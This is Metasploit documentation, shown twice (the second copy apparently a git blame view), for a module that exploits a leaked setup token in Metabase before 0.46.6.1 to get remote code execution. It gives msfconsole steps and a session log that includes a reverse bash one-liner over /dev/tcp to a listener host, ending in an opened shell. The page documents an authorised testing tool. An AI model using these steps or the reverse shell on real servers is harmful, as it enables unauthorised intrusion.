documentation/modules/exploit/linux/http/metabase_setup_token_rce.md

## Vulnerable Application

Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token
is accessible even after the setup process has been completed. With this token
a user is able to submit the setup functionality to create a new database.
When creating a new database, an H2 database string is created with a TRIGGER
that allows for code execution. We use a sample database for our connection
string to prevent corrupting real databases.

Successfully tested against Metabase 0.46.6.

### Install

```
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.46.6
```

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/http/metabase_setup_token_rce`
1. Do: `set rhosts [ip]`
1. Do: `run`
1. You should get a shell.

## Options

## Scenarios

### Metabase 0.46.6 on Docker

```
msf6 > use exploit/linux/http/metabase_setup_token_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/metabase_setup_token_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/metabase_setup_token_rce) > set lhost 111.111.11.111
lhost => 111.111.11.111
msf6 exploit(linux/http/metabase_setup_token_rce) > set verbose true
verbose => true
msf6 exploit(linux/http/metabase_setup_token_rce) > exploit

[+] bash -c '0<&46-;exec 46<>/dev/tcp/111.111.11.111/4444;sh <&46 >&46 2>&46'
[*] Started reverse TCP handler on 111.111.11.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.46.6
[+] Found setup token: 45a2c97a-97f5-4a89-8f37-769b13411d16
[*] Sending exploit
[*] Command shell session 1 opened (111.111.11.111:4444 -> 222.22.2.2:55650) at 2023-07-28 12:48:47 +0000

id
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)
```
metabase setup token rce 2023-07-28 16:09:56 -04:00			`## Vulnerable Application`

			`Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token`
			`is accessible even after the setup process has been completed. With this token`
			`a user is able to submit the setup functionality to create a new database.`
			`When creating a new database, an H2 database string is created with a TRIGGER`
			`that allows for code execution. We use a sample database for our connection`
			`string to prevent corrupting real databases.`

			`Successfully tested against Metabase 0.46.6.`

			`### Install`

			```
			`docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.46.6`
			```

			`## Verification Steps`

			`1. Install the application`
			`1. Start msfconsole`
			1. Do: `use exploit/linux/http/metabase_setup_token_rce`
			1. Do: `set rhosts [ip]`
			1. Do: `run`
			`1. You should get a shell.`

			`## Options`

			`## Scenarios`

			`### Metabase 0.46.6 on Docker`

			```
			`msf6 > use exploit/linux/http/metabase_setup_token_rce`
			`[*] Using configured payload cmd/unix/reverse_bash`
			`msf6 exploit(linux/http/metabase_setup_token_rce) > set rhosts 127.0.0.1`
			`rhosts => 127.0.0.1`
			`msf6 exploit(linux/http/metabase_setup_token_rce) > set lhost 111.111.11.111`
			`lhost => 111.111.11.111`
			`msf6 exploit(linux/http/metabase_setup_token_rce) > set verbose true`
			`verbose => true`
			`msf6 exploit(linux/http/metabase_setup_token_rce) > exploit`

			`[+] bash -c '0<&46-;exec 46<>/dev/tcp/111.111.11.111/4444;sh <&46 >&46 2>&46'`
			`[*] Started reverse TCP handler on 111.111.11.111:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable. Version Detected: 0.46.6`
			`[+] Found setup token: 45a2c97a-97f5-4a89-8f37-769b13411d16`
			`[*] Sending exploit`
			`[*] Command shell session 1 opened (111.111.11.111:4444 -> 222.22.2.2:55650) at 2023-07-28 12:48:47 +0000`

			`id`
			`uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)`
			```